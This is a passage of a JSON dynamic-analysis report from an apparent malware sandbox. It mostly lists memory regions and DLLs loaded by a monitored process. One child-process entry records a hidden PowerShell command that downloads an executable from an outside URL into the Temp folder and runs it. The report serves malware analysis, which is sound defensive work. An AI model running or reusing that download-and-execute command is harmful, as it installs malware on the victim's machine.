"region_type": "private_memory", "start_va": 29884416, "timestamp": "00:00:27.251", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1862336512, "type": "region", "version": 1 }, "end_va": 1862361087, "entry_point": 1862336512, "filename": "\\Windows\\System32\\rasadhlp.dll", "id": "region_527", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\system32\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 1862336512, "timestamp": "00:00:27.256", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000528-addr_0x0000000001b30000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_75", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 28508160, "type": "region", "version": 1 }, "end_va": 29556735, "entry_point": 0, "filename": null, "id": "region_528", "name": "private_0x0000000001b30000", "norm_filename": null, "region_type": "private_memory", "start_va": 28508160, "timestamp": "00:00:27.292", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000529-addr_0x0000000001dd0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_76", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 31260672, "type": "region", "version": 1 }, "end_va": 32309247, "entry_point": 0, "filename": null, "id": "region_529", "name": "private_0x0000000001dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31260672, "timestamp": "00:00:27.293", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000530-addr_0x0000000001f90000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_77", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 33095680, "type": "region", "version": 1 }, "end_va": 33161215, "entry_point": 0, "filename": null, "id": "region_530", "name": "private_0x0000000001f90000", "norm_filename": null, "region_type": "private_memory", "start_va": 33095680, "timestamp": "00:00:27.294", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1940455424, "type": "region", "version": 1 }, "end_va": 1940520959, "entry_point": 1940455424, "filename": "\\Windows\\System32\\NapiNSP.dll", "id": "region_531", "name": "napinsp.dll", "norm_filename": "c:\\windows\\system32\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 1940455424, "timestamp": "00:00:27.294", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000532-addr_0x000000007ffd9000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_78", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147323904, "type": "region", "version": 1 }, "end_va": 2147327999, "entry_point": 0, "filename": null, "id": "region_532", "name": "private_0x000000007ffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147323904, "timestamp": "00:00:27.295", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1940258816, "type": "region", "version": 1 }, "end_va": 1940332543, "entry_point": 1940258816, "filename": "\\Windows\\System32\\pnrpnsp.dll", "id": "region_533", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\system32\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 1940258816, "timestamp": "00:00:27.297", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1957888000, "type": "region", "version": 1 }, "end_va": 1958133759, "entry_point": 1957888000, "filename": "\\Windows\\System32\\mswsock.dll", "id": "region_534", "name": "mswsock.dll", "norm_filename": "c:\\windows\\system32\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 1957888000, "timestamp": "00:00:27.299", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1940193280, "type": "region", "version": 1 }, "end_va": 1940226047, "entry_point": 1940193280, "filename": "\\Windows\\System32\\winrnr.dll", "id": "region_535", "name": "winrnr.dll", "norm_filename": "c:\\windows\\system32\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 1940193280, "timestamp": "00:00:27.301", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1952972800, "type": "region", "version": 1 }, "end_va": 1952993279, "entry_point": 1952972800, "filename": "\\Windows\\System32\\WSHTCPIP.DLL", "id": "region_536", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\system32\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 1952972800, "timestamp": "00:00:27.303", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1957822464, "type": "region", "version": 1 }, "end_va": 1957847039, "entry_point": 1957822464, "filename": "\\Windows\\System32\\wship6.dll", "id": "region_537", "name": "wship6.dll", "norm_filename": "c:\\windows\\system32\\wship6.dll", "region_type": "memory_mapped_file", "start_va": 1957822464, "timestamp": "00:00:27.305", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000538-addr_0x0000000000560000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_79", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 5767167, "entry_point": 0, "filename": null, "id": "region_538", "name": "private_0x0000000000560000", "norm_filename": null, "region_type": "private_memory", "start_va": 5636096, "timestamp": "00:00:27.310", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 229376, "start_va": 1932001280, "type": "region", "version": 1 }, "end_va": 1932230655, "entry_point": 1932001280, "filename": "\\Windows\\System32\\FWPUCLNT.DLL", "id": "region_539", "name": "fwpuclnt.dll", "norm_filename": "c:\\windows\\system32\\fwpuclnt.dll", "region_type": "memory_mapped_file", "start_va": 1932001280, "timestamp": "00:00:27.316", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000540-addr_0x0000000001f40000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_80", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 32768000, "type": "region", "version": 1 }, "end_va": 33030143, "entry_point": 0, "filename": null, "id": "region_540", "name": "private_0x0000000001f40000", "norm_filename": null, "region_type": "private_memory", "start_va": 32768000, "timestamp": "00:00:27.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 368640, "start_va": 1867710464, "type": "region", "version": 1 }, "end_va": 1868079103, "entry_point": 1867710464, "filename": "\\Windows\\System32\\netprofm.dll", "id": "region_541", "name": "netprofm.dll", "norm_filename": "c:\\windows\\system32\\netprofm.dll", "region_type": "memory_mapped_file", "start_va": 1867710464, "timestamp": "00:00:27.346", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000542-addr_0x0000000002020000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_81", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 33685504, "type": "region", "version": 1 }, "end_va": 34734079, "entry_point": 0, "filename": null, "id": "region_542", "name": "private_0x0000000002020000", "norm_filename": null, "region_type": "private_memory", "start_va": 33685504, "timestamp": "00:00:27.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958240255, "entry_point": 1958150144, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_543", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:00:27.359", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000544-addr_0x000000007ffd8000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_82", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147319808, "type": "region", "version": 1 }, "end_va": 2147323903, "entry_point": 0, "filename": null, "id": "region_544", "name": "private_0x000000007ffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147319808, "timestamp": "00:00:27.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1955659776, "type": "region", "version": 1 }, "end_va": 1955901439, "entry_point": 1955659776, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_545", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1955659776, "timestamp": "00:00:27.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1963524096, "type": "region", "version": 1 }, "end_va": 1963581439, "entry_point": 1963524096, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_546", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1963524096, "timestamp": "00:00:27.371", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1968635904, "type": "region", "version": 1 }, "end_va": 1968648191, "entry_point": 1968635904, "filename": "\\Windows\\System32\\normaliz.dll", "id": "region_547", "name": "normaliz.dll", "norm_filename": "c:\\windows\\system32\\normaliz.dll", "region_type": "memory_mapped_file", "start_va": 1968635904, "timestamp": "00:00:27.373", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000548-addr_0x0000000002240000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_83", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 35913728, "type": "region", "version": 1 }, "end_va": 36962303, "entry_point": 0, "filename": null, "id": "region_548", "name": "private_0x0000000002240000", "norm_filename": null, "region_type": "private_memory", "start_va": 35913728, "timestamp": "00:00:27.398", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1915158528, "type": "region", "version": 1 }, "end_va": 1915203583, "entry_point": 1915158528, "filename": "\\Windows\\System32\\msimtf.dll", "id": "region_549", "name": "msimtf.dll", "norm_filename": "c:\\windows\\system32\\msimtf.dll", "region_type": "memory_mapped_file", "start_va": 1915158528, "timestamp": "00:00:27.398", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000550-addr_0x000000007ffd7000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_84", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147315712, "type": "region", "version": 1 }, "end_va": 2147319807, "entry_point": 0, "filename": null, "id": "region_550", "name": "private_0x000000007ffd7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147315712, "timestamp": "00:00:27.461", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000551-addr_0x0000000002430000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_85", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 37945344, "type": "region", "version": 1 }, "end_va": 38993919, "entry_point": 0, "filename": null, "id": "region_551", "name": "private_0x0000000002430000", "norm_filename": null, "region_type": "private_memory", "start_va": 37945344, "timestamp": "00:00:27.465", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000552-addr_0x000000007ffd6000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_86", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147311616, "type": "region", "version": 1 }, "end_va": 2147315711, "entry_point": 0, "filename": null, "id": "region_552", "name": "private_0x000000007ffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147311616, "timestamp": "00:00:27.465", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1848442880, "type": "region", "version": 1 }, "end_va": 1848475647, "entry_point": 1848442880, "filename": "\\Windows\\System32\\npmproxy.dll", "id": "region_553", "name": "npmproxy.dll", "norm_filename": "c:\\windows\\system32\\npmproxy.dll", "region_type": "memory_mapped_file", "start_va": 1848442880, "timestamp": "00:00:27.472", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1931804672, "type": "region", "version": 1 }, "end_va": 1931878399, "entry_point": 1931804672, "filename": "\\Windows\\System32\\dhcpcsvc.dll", "id": "region_684", "name": "dhcpcsvc.dll", "norm_filename": "c:\\windows\\system32\\dhcpcsvc.dll", "region_type": "memory_mapped_file", "start_va": 1931804672, "timestamp": "00:00:27.595", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1931935744, "type": "region", "version": 1 }, "end_va": 1931988991, "entry_point": 1931935744, "filename": "\\Windows\\System32\\dhcpcsvc6.dll", "id": "region_685", "name": "dhcpcsvc6.dll", "norm_filename": "c:\\windows\\system32\\dhcpcsvc6.dll", "region_type": "memory_mapped_file", "start_va": 1931935744, "timestamp": "00:00:27.597", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000686-addr_0x00000000017c0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_88", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 24903680, "type": "region", "version": 1 }, "end_va": 25427967, "entry_point": 0, "filename": null, "id": "region_686", "name": "private_0x00000000017c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 24903680, "timestamp": "00:00:27.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1919811584, "type": "region", "version": 1 }, "end_va": 1920057343, "entry_point": 1919811584, "filename": "\\Windows\\System32\\oleacc.dll", "id": "region_687", "name": "oleacc.dll", "norm_filename": "c:\\windows\\system32\\oleacc.dll", "region_type": "memory_mapped_file", "start_va": 1919811584, "timestamp": "00:00:27.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 5505024, "type": "region", "version": 1 }, "end_va": 5509119, "entry_point": 5505024, "filename": "\\Windows\\System32\\oleaccrc.dll", "id": "region_688", "name": "oleaccrc.dll", "norm_filename": "c:\\windows\\system32\\oleaccrc.dll", "region_type": "memory_mapped_file", "start_va": 5505024, "timestamp": "00:00:27.738", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 389120, "start_va": 1962934272, "type": "region", "version": 1 }, "end_va": 1963323391, "entry_point": 1962934272, "filename": "\\Windows\\System32\\sxs.dll", "id": "region_689", "name": "sxs.dll", "norm_filename": "c:\\windows\\system32\\sxs.dll", "region_type": "memory_mapped_file", "start_va": 1962934272, "timestamp": "00:00:27.748", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 5771263, "entry_point": 0, "filename": null, "id": "region_690", "name": "pagefile_0x0000000000580000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5767168, "timestamp": "00:00:27.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11010048, "start_va": 1831272448, "type": "region", "version": 1 }, "end_va": 1842282495, "entry_point": 1831272448, "filename": "\\Windows\\System32\\ieframe.dll", "id": "region_693", "name": "ieframe.dll", "norm_filename": "c:\\windows\\system32\\ieframe.dll", "region_type": "memory_mapped_file", "start_va": 1831272448, "timestamp": "00:00:27.761", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 5775359, "entry_point": 0, "filename": null, "id": "region_694", "name": "pagefile_0x0000000000580000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5767168, "timestamp": "00:00:28.223", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 69632, "start_va": 20512768, "type": "region", "version": 1 }, "end_va": 20582399, "entry_point": 20512768, "filename": "\\Windows\\System32\\C_20127.NLS", "id": "region_764", "name": "c_20127.nls", "norm_filename": "c:\\windows\\system32\\c_20127.nls", "region_type": "memory_mapped_file", "start_va": 20512768, "timestamp": "00:00:46.563", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 38993920, "type": "region", "version": 1 }, "end_va": 43134975, "entry_point": 0, "filename": null, "id": "region_765", "name": "pagefile_0x0000000002530000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 38993920, "timestamp": "00:00:46.563", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000766-addr_0x0000000002940000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_103", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 43253760, "type": "region", "version": 1 }, "end_va": 44302335, "entry_point": 0, "filename": null, "id": "region_766", "name": "private_0x0000000002940000", "norm_filename": null, "region_type": "private_memory", "start_va": 43253760, "timestamp": "00:00:46.563", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000767-addr_0x0000000002b90000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_104", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 45678592, "type": "region", "version": 1 }, "end_va": 46727167, "entry_point": 0, "filename": null, "id": "region_767", "name": "private_0x0000000002b90000", "norm_filename": null, "region_type": "private_memory", "start_va": 45678592, "timestamp": "00:00:46.564", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000768-addr_0x000000007ffd4000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_105", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147303424, "type": "region", "version": 1 }, "end_va": 2147307519, "entry_point": 0, "filename": null, "id": "region_768", "name": "private_0x000000007ffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147303424, "timestamp": "00:00:46.564", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000769-addr_0x000000007ffd5000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_106", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147307520, "type": "region", "version": 1 }, "end_va": 2147311615, "entry_point": 0, "filename": null, "id": "region_769", "name": "private_0x000000007ffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147307520, "timestamp": "00:00:46.564", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 729088, "start_va": 1854668800, "type": "region", "version": 1 }, "end_va": 1855397887, "entry_point": 1854668800, "filename": "\\Windows\\System32\\jscript.dll", "id": "region_770", "name": "jscript.dll", "norm_filename": "c:\\windows\\system32\\jscript.dll", "region_type": "memory_mapped_file", "start_va": 1854668800, "timestamp": "00:00:46.611", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1912143872, "type": "region", "version": 1 }, "end_va": 1912279039, "entry_point": 1912143872, "filename": "\\Windows\\System32\\wshom.ocx", "id": "region_771", "name": "wshom.ocx", "norm_filename": "c:\\windows\\system32\\wshom.ocx", "region_type": "memory_mapped_file", "start_va": 1912143872, "timestamp": "00:00:46.766", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000775-addr_0x0000000002d60000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_107", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 47579136, "type": "region", "version": 1 }, "end_va": 48627711, "entry_point": 0, "filename": null, "id": "region_775", "name": "private_0x0000000002d60000", "norm_filename": null, "region_type": "private_memory", "start_va": 47579136, "timestamp": "00:00:47.030", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000777-addr_0x000000007ffd3000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_108", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147299328, "type": "region", "version": 1 }, "end_va": 2147303423, "entry_point": 0, "filename": null, "id": "region_777", "name": "private_0x000000007ffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147299328, "timestamp": "00:00:47.030", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000804-addr_0x0000000002a90000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_113", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 44630016, "type": "region", "version": 1 }, "end_va": 45678591, "entry_point": 0, "filename": null, "id": "region_804", "name": "private_0x0000000002a90000", "norm_filename": null, "region_type": "private_memory", "start_va": 44630016, "timestamp": "00:00:47.272", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000805-addr_0x000000007ffaf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_114", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147151872, "type": "region", "version": 1 }, "end_va": 2147155967, "entry_point": 0, "filename": null, "id": "region_805", "name": "private_0x000000007ffaf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147151872, "timestamp": "00:00:47.273", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000806-addr_0x0000000002c90000-size_0x0000000000190000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_115", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1638400, "start_va": 46727168, "type": "region", "version": 1 }, "end_va": 48365567, "entry_point": 0, "filename": null, "id": "region_806", "name": "private_0x0000000002c90000", "norm_filename": null, "region_type": "private_memory", "start_va": 46727168, "timestamp": "00:00:47.283", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://doc2th.com/tin/off.exe', 'C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe');C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe", "filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_5", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 5, "origin_monitor_id": 3, "ref_parent_process": { "ref_id": "proc_3", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000005-region_00000794-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_109", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_794", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:47.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_795", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:47.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_796", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:47.193", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000797-addr_0x0000000000110000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_110", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1376255, "entry_point": 0, "filename": null, "id": "region_797", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": 